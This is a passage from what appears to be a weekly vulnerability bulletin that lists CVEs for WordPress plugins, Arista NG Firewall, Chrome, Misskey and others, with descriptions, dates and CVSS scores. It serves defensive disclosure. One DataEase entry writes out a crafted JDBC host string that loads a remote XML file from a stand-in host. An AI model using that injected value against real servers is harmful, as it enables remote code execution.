| TreasureHuntGame--TreasureHunt |
A vulnerability has been found in TreasureHuntGame TreasureHunt up to 963e0e0 and classified as critical. Affected by this vulnerability is the function console_log of the file TreasureHunt/checkflag.php. The manipulation of the argument problema leads to sql injection. The attack can be launched remotely. The identifier of the patch is 8bcc649abc35b7734951be084bb522a532faac4e. It is recommended to apply a patch to fix this issue. | 2024-12-22 | 6.3 | CVE-2024-12895 |
| Trellix--DLP Extension |
A Hardcoded Cryptographic key vulnerability existed in DLP Extension 11.11.1.3 which allowed the decryption of previously encrypted user credentials. | 2024-12-16 | 5.3 | CVE-2024-9679 |
| Trellix--DLP Extension |
An SQL Injection vulnerability existed in DLP Extension 11.11.1.3. The vulnerability allowed an attacker to perform arbitrary SQL queries potentially leading to command execution. | 2024-12-16 | 4.9 | CVE-2024-9678 |
| Trellix--ePO Onprem Sp1 Update4 |
Cross-site scripting vulnerability in Trellix ePolicy Orchestrator prior to ePO 5.10 Service Pack 1 Update 3 allows a remote authenticated attacker to craft requests causing arbitrary content to be injected into the response when accessing the epolicy Orchestrator. | 2024-12-20 | 5.4 | CVE-2024-5955 |
| tugbucket--Multi-column Tag Map |
The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mctagmap shortcode in all versions up to, and including, 17.0.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-21 | 6.4 | CVE-2024-11196 |
| tymotey--Easy Waveform Player |
The Easy Waveform Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easywaveformplayer' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-18 | 6.4 | CVE-2024-11881 |
| Unknown--Cost Calculator Builder |
The Cost Calculator Builder WordPress plugin before 3.2.43 does not have CSRF checks in some AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. | 2024-12-18 | 5.4 | CVE-2024-10892 |
| Unknown--Download Manager |
The Download Manager WordPress plugin before 3.3.03 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-20 | 4.8 | CVE-2024-10706 |
| Unknown--Serious Slider |
The Serious Slider WordPress plugin before 1.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-12-20 | 5.4 | CVE-2024-11108 |
| Unknown--The Events Calendar |
The Events Calendar WordPress plugin before 6.8.2.1 is missing access checks in the REST API, allowing for unauthenticated users to access information about password protected events. | 2024-12-16 | 5.3 | CVE-2024-5333 |
| Unknown--Tithe.ly Giving Button |
The Tithe.ly Giving Button WordPress plugin through 1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-12-16 | 5.4 | CVE-2024-11841 |
| Unknown--WordPress Button Plugin MaxButtons |
The WordPress Button Plugin MaxButtons WordPress plugin before 9.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-20 | 4.8 | CVE-2024-10555 |
| Unknown--WordPress Button Plugin MaxButtons |
The WordPress Button Plugin MaxButtons WordPress plugin before 9.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-20 | 4.7 | CVE-2024-8968 |
| van-abel--LaTeX2HTML |
The LaTeX2HTML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ver' or 'date' parameter in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-21 | 6.1 | CVE-2024-11688 |
| vCita.com--Online Booking & Scheduling Calendar for WordPress by vcita |
Cross-Site Request Forgery (CSRF) vulnerability in vCita.com Online Booking & Scheduling Calendar for WordPress by vcita allows Cross Site Request Forgery.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through 4.5. | 2024-12-16 | 5.4 | CVE-2024-54356 |
| videowhisper--Video Share VOD Turnkey Video Site Builder Script |
The Video Share VOD - Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_player_html' shortcode in all versions up to, and including, 2.6.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-18 | 6.4 | CVE-2024-12449 |
| vivo--Alarm clock |
Some parameters of the alarm clock module are improperly stored, leaking some sensitive information. | 2024-12-17 | 5.5 | CVE-2021-26281 |
| vivo--Weather |
Some parameters of the weather module are improperly stored, leaking some sensitive information. | 2024-12-17 | 5.9 | CVE-2021-26279 |
| vivo--Wifi |
When using special mode to connect to enterprise wifi, certain options are not properly configured and attackers can pretend to be enterprise wifi through a carefully constructed wifi with the same name, which can lead to man-in-the-middle attacks. | 2024-12-17 | 6.4 | CVE-2020-12484 |
| vivo--Wifi |
The wifi module exposes the interface and has improper permission control, leaking sensitive information about the device. | 2024-12-17 | 6.3 | CVE-2021-26278 |
| wbolt--MagicPost WordPress |
The MagicPost plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wb_share_social shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-21 | 6.4 | CVE-2024-12591 |
| wealcoder--Animation Addons for Elementor |
The Animation Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the 'render' function in widgets/content-slider.php and widgets/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data. | 2024-12-18 | 4.3 | CVE-2024-12340 |
| Web Chunky--Order Delivery & Pickup Location Date Time |
Missing Authorization vulnerability in Web Chunky Order Delivery & Pickup Location Date Time allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Delivery & Pickup Location Date Time: from n/a through 1.1.0. | 2024-12-18 | 6.5 | CVE-2024-55997 |
| wedevs--WP Project Manager Task, team, and project management plugin featuring kanban board and gantt charts |
The WP Project Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.15 via the Project Task List ('/wp-json/pm/v2/projects/1/task-lists') REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the hashed passwords of project owners (e.g. adminstrators). | 2024-12-19 | 6.5 | CVE-2024-10548 |
| withastro--astro |
Astro is a web framework for content-driven websites. In affected versions a bug in Astro's CSRF-protection middleware allows requests to bypass CSRF checks. When the `security.checkOrigin` configuration option is set to `true`, Astro middleware will perform a CSRF check. However, a vulnerability exists that can bypass this security. A semicolon-delimited parameter is allowed after the type in `Content-Type`. Web browsers will treat a `Content-Type` such as `application/x-www-form-urlencoded; abc` as a `simple request` and will not perform preflight validation. In this case, CSRF is not blocked as expected. Additionally, the `Content-Type` header is not required for a request. This issue has been addressed in version 4.16.17 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | 5.9 | CVE-2024-56140 |
| WPENGINE, INC.--Advanced Custom Fields PRO |
Cross-Site Request Forgery (CSRF) vulnerability in WPENGINE, INC. Advanced Custom Fields PRO.This issue affects Advanced Custom Fields PRO: from n/a before 6.3.2. | 2024-12-16 | 4.3 | CVE-2024-37251 |
| wpseahorse--WP on AWS |
The WP on AWS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST data in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-21 | 6.1 | CVE-2024-12408 |
| wpswings--One Click Upsell Funnel for WooCommerce Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder |
The One Click Upsell Funnel for WooCommerce - Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wps_wocuf_pro_yes shortcode in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-21 | 6.4 | CVE-2024-11938 |
| yasinedr--Maintenance & Coming Soon Redirect Animation |
The Maintenance & Coming Soon Redirect Animation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wploti_add_whitelisted_roles_option', 'wploti_remove_whitelisted_roles_option', 'wploti_add_whitelisted_users_option', 'wploti_remove_whitelisted_users_option', and 'wploti_uploaded_animation_save_option' functions in all versions up to, and including, 2.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify certain plugin settings. | 2024-12-20 | 4.3 | CVE-2024-9503 |
| YayCommerce--Brand |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YayCommerce Brand allows Stored XSS.This issue affects Brand: from n/a through 1.1.6. | 2024-12-16 | 6.5 | CVE-2024-54348 |
| Yudiz Solutions Ltd.--WP Menu Image |
Missing Authorization vulnerability in Yudiz Solutions Ltd. WP Menu Image allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Menu Image: from n/a through 2.2. | 2024-12-18 | 6.5 | CVE-2024-52485 |
| yuryonfolio--PPWP Password Protect Pages |
The PPWP - Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-12-17 | 5.3 | CVE-2024-11280 |
| zealopensource--Accept Authorize.NET Payments Using Contact Form 7 |
The Accept Authorize.NET Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2 via the cf7adn-info.php file. This makes it possible for unauthenticated attackers to extract configuration data which can be used to aid in other attacks. | 2024-12-18 | 5.3 | CVE-2024-12250 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| code-projects--Hostel Management Site |
A vulnerability was found in code-projects Hostel Management Site 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file room-details.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 3.5 | CVE-2024-12790 |
| code-projects--Online Exam Mastering System |
A vulnerability classified as problematic was found in code-projects Online Exam Mastering System 1.0. Affected by this vulnerability is an unknown functionality of the file /sign.php?q=account.php. The manipulation of the argument name/gender/college leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-22 | 3.5 | CVE-2024-12892 |
| discourse--discourse |
Discourse is an open source platform for community discussion. Moderators can see the Screened emails list in the admin dashboard, and through that can learn the email of a user. This problem is patched in the latest version of Discourse. Users unable to upgrade should remove moderator role from untrusted users. | 2024-12-19 | 2.2 | CVE-2024-52589 |
| funnyzpc--Mee-Admin |
A vulnerability classified as problematic was found in funnyzpc Mee-Admin up to 1.6. This vulnerability affects unknown code of the file /mee/login of the component Login. The manipulation of the argument username leads to observable response discrepancy. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. | 2024-12-16 | 3.7 | CVE-2024-12663 |
| HCL Software--BigFix Inventory |
An improper handling of insufficient permissions or privileges affects HCL BigFix Inventory. An attacker having access via a read-only account can possibly change certain configuration parameters by crafting a specific REST API call. | 2024-12-17 | 3.1 | CVE-2024-42194 |
| Huawei--HUAWEI Mate 20 Pro |
There is an insufficient authentication vulnerability in some Huawei smart phone. An unauthenticated, local attacker can crafts software package to exploit this vulnerability. Due to insufficient verification, successful exploitation may impact the service. (Vulnerability ID: HWPSIRT-2019-12302) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9250. | 2024-12-20 | 3.3 | CVE-2020-9250 |
| IBM--Security Guardium Key Lifecycle Manager |
IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1Â could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. | 2024-12-17 | 3.7 | CVE-2024-49820 |
| invoiceplane -- invoiceplane |
A vulnerability was found in InvoicePlane up to 1.6.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /invoices/view. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.2-beta-1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2024-12-16 | 3.7 | CVE-2024-12667 |
| itsourcecode--Vehicle Management System |
A vulnerability was found in itsourcecode Vehicle Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /billaction.php. The manipulation of the argument extra-cost leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 3.5 | CVE-2024-12783 |
| n/a--Emlog Pro |
A vulnerability classified as problematic was found in Emlog Pro up to 2.4.1. Affected by this vulnerability is an unknown functionality in the library /include/lib/common.php. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-20 | 3.5 | CVE-2024-12845 |
| Portabilis--i-Educar |
A vulnerability, which was classified as problematic, has been found in Portabilis i-Educar up to 2.9. Affected by this issue is some unknown functionality of the file /usuarios/tipos/2 of the component Tipo de Usuário Page. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-22 | 2.4 | CVE-2024-12893 |
| ruifang-tech -- rebuild |
A vulnerability, which was classified as problematic, has been found in ruifang-tech Rebuild 3.8.5. This issue affects some unknown processing of the component Project Task Comment Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 3.5 | CVE-2024-12664 |
| ruifang-tech -- rebuild |
A vulnerability, which was classified as problematic, was found in ruifang-tech Rebuild 3.8.5. Affected is an unknown function of the component Task Comment Attachment Upload. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 3.5 | CVE-2024-12665 |
| smub--Easy Digital Downloads eCommerce Payments and Subscriptions made easy |
The Easy Digital Downloads plugin for WordPress is vulnerable to Improper Authorization in versions 3.1 through 3.3.4. This is due to a lack of sufficient validation checks within the 'verify_guest_email' function to ensure the requesting user is the intended recipient of the purchase receipt. This makes it possible for unauthenticated attackers to bypass intended security restrictions and view the receipts of other users, which contains a link to download paid content. Successful exploitation requires knowledge of another customers email address as well as the file ID of the content they purchased. | 2024-12-17 | 3.7 | CVE-2024-9654 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Absolute Software--Secure Access |
There is a cross-site scripting vulnerability in the management console of Absolute Secure Access prior to version 13.52. Attackers with system administrator permissions can interfere with another system administrator's use of the management console when the second administrator logs in. Attack complexity is high, attack requirements are present, privileges required are high, user interaction required is none. The impact to confidentiality is none, the impact to availability is low, and the impact to system integrity is high. | 2024-12-20 | not yet calculated | CVE-2024-40875 |
| Apache Software Foundation--Apache Tomcat |
Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The mitigation for CVE-2024-50379 was incomplete. Users running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation parameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379 depending on which version of Java they are using with Tomcat: - running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true) - running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false) - running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed) Tomcat 11.0.3, 10.1.35 and 9.0.99 onwards will include checks that sun.io.useCanonCaches is set appropriately before allowing the default servlet to be write enabled on a case insensitive file system. Tomcat will also set sun.io.useCanonCaches to false by default where it can. | 2024-12-20 | not yet calculated | CVE-2024-56337 |
| Apple--GarageBand |
This issue was addressed with improved validation of the process entitlement and Team ID. This issue is fixed in GarageBand 10.4.9. An app may be able to gain root privileges. | 2024-12-20 | not yet calculated | CVE-2023-42867 |
| Apple--macOS |
This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.1. An attacker with physical access to a Mac may be able to view protected content from the Login Window. | 2024-12-20 | not yet calculated | CVE-2024-44223 |
| Arctic Security--Arctic Hub |
Server-Side Request Forgery in URL Mapper in Arctic Security's Arctic Hub versions 3.0.1764-5.6.1877 allows an unauthenticated remote attacker to exfiltrate and modify configurations and data. | 2024-12-20 | not yet calculated | CVE-2024-12867 |
| Arista--NG Firewall |
Arista NG Firewall ExecManagerImpl Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The specific flaw exists within the ExecManagerImpl class. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24015. | 2024-12-20 | not yet calculated | CVE-2024-12829 |
| Arista--NG Firewall |
Arista NG Firewall custom_handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the custom_handler method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the www-data user. Was ZDI-CAN-24019. | 2024-12-20 | not yet calculated | CVE-2024-12830 |
| Arista--NG Firewall |
Arista NG Firewall uvm_login Incorrect Authorization Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Arista NG Firewall. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the uvm_login module. The issue results from incorrect authorization. An attacker can leverage this to escalate privileges to resources normally protected from the user. Was ZDI-CAN-24324. | 2024-12-20 | not yet calculated | CVE-2024-12831 |
| Arista--NG Firewall |
Arista NG Firewall ReportEntry SQL Injection Arbitrary File Read and Write Vulnerability. This vulnerability allows remote attackers to create arbitrary files and disclose sensitive information on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The specific flaw exists within the ReportEntry class. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the www-data user. Was ZDI-CAN-24325. | 2024-12-20 | not yet calculated | CVE-2024-12832 |
| Checkmk GmbH--Checkmk |
Incorrect permissions on the Checkmk Windows Agent's data directory in Checkmk < 2.3.0p23, < 2.2.0p38 and <= 2.1.0p49 (EOL) allows a local attacker to read sensitive data. | 2024-12-19 | not yet calculated | CVE-2024-38864 |
| craftcms--cms |
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 3.9.14, 4.13.2, or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue. | 2024-12-18 | not yet calculated | CVE-2024-56145 |
| dataease--dataease |
DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | not yet calculated | CVE-2024-55952 |
| dataease--dataease |
DataEase is an open source business analytics tool. Authenticated users can read and deserialize arbitrary files through the background JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. This vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | not yet calculated | CVE-2024-55953 |
| DirectAdmin--DirectAdmin Evolution Skin |
Ticket management system in DirectAdmin Evolution Skin is vulnerable to XSS (Cross-site Scripting), which allows a low-privileged user to inject and store malicious JavaScript code. If an admin views the ticket, the script might perform actions with their privileges, including command execution. This issue has been fixed in version 1.668 of DirectAdmin Evolution Skin. | 2024-12-20 | not yet calculated | CVE-2024-10385 |
| Elastic--Elasticsearch |
An issue was discovered where improper authorization controls affected certain queries that could allow a malicious actor to circumvent Document Level Security in Elasticsearch and get access to documents that their roles would normally not allow. | 2024-12-17 | not yet calculated | CVE-2024-12539 |
| golang.org/x/net--golang.org/x/net/html |
An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This could cause a denial of service. | 2024-12-18 | not yet calculated | CVE-2024-45338 |
| Google--Android |
In dhd_prot_flowrings_pool_release of dhd_msgbuf.c, there is a possible outcof bounds write due to a missing bounds check. This could lead to localcescalation of privilege with no additional execution privileges needed. Usercinteraction is not needed for exploitation. | 2024-12-18 | not yet calculated | CVE-2024-47038 |
| Google--Android |
In isSlotMarkedSuccessful of BootControl.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-18 | not yet calculated | CVE-2024-47039 |
| Google--Android |
There is a possible UAF due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-18 | not yet calculated | CVE-2024-47040 |
| Google--Chrome |
Type Confusion in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-12-18 | not yet calculated | CVE-2024-12692 |
| Google--Chrome |
Out of bounds memory access in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2024-12-18 | not yet calculated | CVE-2024-12693 |
| Google--Chrome |
Use after free in Compositing in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-12-18 | not yet calculated | CVE-2024-12694 |
| Google--Chrome |
Out of bounds write in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2024-12-18 | not yet calculated | CVE-2024-12695 |
| gqevu6bsiz--My WP Customize Admin/Frontend |
Cross-site scripting vulnerability exists in My WP Customize Admin/Frontend versions prior to ver 1.24.1. If a malicious administrative user customizes the administrative page with some malicious contents, an arbitrary script may be executed on the web browser of the other users who are accessing the page. | 2024-12-17 | not yet calculated | CVE-2024-55864 |
| HMS Networks--Ewon Flexy 205 |
A code injection vulnerability in HMS Networks Ewon Flexy 205 allows executing commands on system level on the device. This issue affects Ewon Flexy 205: through 14.8s0 (#2633). | 2024-12-19 | not yet calculated | CVE-2024-9154 |
| InseeFrLab--onyxia |
Onyxia is a web app that aims at being the glue between multiple open source backend technologies to provide a state of art working environment for data scientists. This critical vulnerability allows authenticated users to remotely execute code within the Onyxia-API, leading to potential consequences such as unauthorized access to other user environments and denial of service attacks. This issue has been patched in api versions 4.2.0, 3.1.1, and 2.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-20 | not yet calculated | CVE-2024-56333 |
| joelbutcher--socialstream |
Socialstream is a third-party package for Laravel Jetstream. It replaces the published authentication and profile scaffolding provided by Laravel Jetstream, with scaffolding that has support for Laravel Socialite. When linking a social account to an already authenticated user, the lack of a confirmation step introduces a security risk. This is exacerbated if ->stateless() is used in the Socialite configuration, bypassing state verification and making the exploit easier. Developers should ensure that users explicitly confirm account linking and avoid configurations that skip critical security checks. Socialstream v6.2 introduces a new custom route that requires a user to "Confirm" or "Deny" a request to link a social account. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-20 | not yet calculated | CVE-2024-56329 |
| leonhad--pdftools |
pdftools is a high level tools to convert PDF files to ePUB formats. In versions up to and including 0.5.0 maliciously crafted epub files can cause a stack overflow leading to a crash. This issue has not yet been addressed and users are advised to avoid untrusted input to their systems. | 2024-12-17 | not yet calculated | CVE-2024-56139 |
| Liferay--Portal |
Reflected cross-site scripting (XSS) vulnerability in Liferay Portal 7.1.0 through 7.4.3.38, and Liferay DXP 7.4 GA through update 38, 7.3 GA through update 36, 7.2 GA through fix pack 20 and 7.1 GA through fix pack 28 allows remote attackers to execute arbitrary web script or HTML via Dispatch name field | 2024-12-17 | not yet calculated | CVE-2024-11993 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: Align BR/EDR JUST_WORKS paring with LE This aligned BR/EDR JUST_WORKS method with LE which since 92516cd97fd4 ("Bluetooth: Always request for user confirmation for Just Works") always request user confirmation with confirm_hint set since the likes of bluetoothd have dedicated policy around JUST_WORKS method (e.g. main.conf:JustWorksRepairing). CVE: CVE-2024-8805 | 2024-12-17 | not yet calculated | CVE-2024-53144 |
| Matter--Matter |
In Matter (aka connectedhomeip or Project CHIP) through 1.4.0.0, the WriteAcl function deletes all existing ACL entries first, and then attempts to recreate them based on user input. If input validation fails during decoding, the process stops, and no entries are restored by access-control-server.cpp, i.e., a denial of service. | 2024-12-18 | not yet calculated | CVE-2024-56317 |
| Matter--Matter |
In raw\TCP.cpp in Matter (aka connectedhomeip or Project CHIP) through 1.4.0.0 before 27ca6ec, there is a NULL pointer dereference in TCPBase::ProcessSingleMessage via TCP packets with zero messageSize, leading to denial of service. | 2024-12-18 | not yet calculated | CVE-2024-56318 |
| Matter--Matter |
In Matter (aka connectedhomeip or Project CHIP) through 1.4.0.0 before e3277eb, unlimited user label appends in a userlabel cluster can lead to a denial of service (resource exhaustion). | 2024-12-18 | not yet calculated | CVE-2024-56319 |
| metabase--metabase |
Metabase is an open-source data analytics platform. For new sandboxing configurations created in 1.52.0 till 1.52.2.4, sandboxed users are able to see field filter values from other sandboxed users. This is fixed in 1.52.2.5. Users on 1.52.0 or 1.52.1 or 1.5.2 should upgrade to 1.52.2.5. There are no workarounds for this issue aside from upgrading. | 2024-12-16 | not yet calculated | CVE-2024-55951 |
| minio--minio |
MinIO is a high-performance, S3 compatible object store, open sourced under GNU AGPLv3 license. Minio is subject to a privilege escalation in IAM import API, all users are impacted since MinIO commit `580d9db85e04f1b63cc2909af50f0ed08afa965f`. This issue has been addressed in commit `f246c9053f9603e610d98439799bdd2a6b293427` which is included in RELEASE.2024-12-13T22-19-12Z. There are no workarounds possible, all users are advised to upgrade immediately. | 2024-12-16 | not yet calculated | CVE-2024-55949 |
| misskey-dev--misskey |
Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` allows an attacker to create fake user profiles that appear to be from a different instance than the one where they actually exist. These profiles can be used to impersonate existing users from the target instance. Vulnerable Misskey instances will accept spoofed users as valid, allowing an attacker to impersonate users on another instance. Attackers have full control of the spoofed user and can post, renote, or otherwise interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | not yet calculated | CVE-2024-52590 |
| misskey-dev--misskey |
Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` and `HttpRequestService.getActivityJson` allows an attacker to create fake user profiles and forged notes. The spoofed users will appear to be from a different instance than the one where they actually exist, and the forged notes will appear to be posted by a different user. Vulnerable Misskey instances will accept the spoofed objects as valid, allowing an attacker to impersonate other users and instances. The attacker retains full control of the spoofed user / note and can interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | not yet calculated | CVE-2024-52591 |
| misskey-dev--misskey |
Misskey is an open source, federated social media platform. In affected versions missing validation in `ApInboxService.update` allows an attacker to modify the result of polls belonging to another user. No authentication is required, except for a valid signature from any actor on any remote instance. Vulnerable Misskey instances will accept spoofed updates for remote polls. Local polls are unaffected. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | not yet calculated | CVE-2024-52592 |
| misskey-dev--misskey |
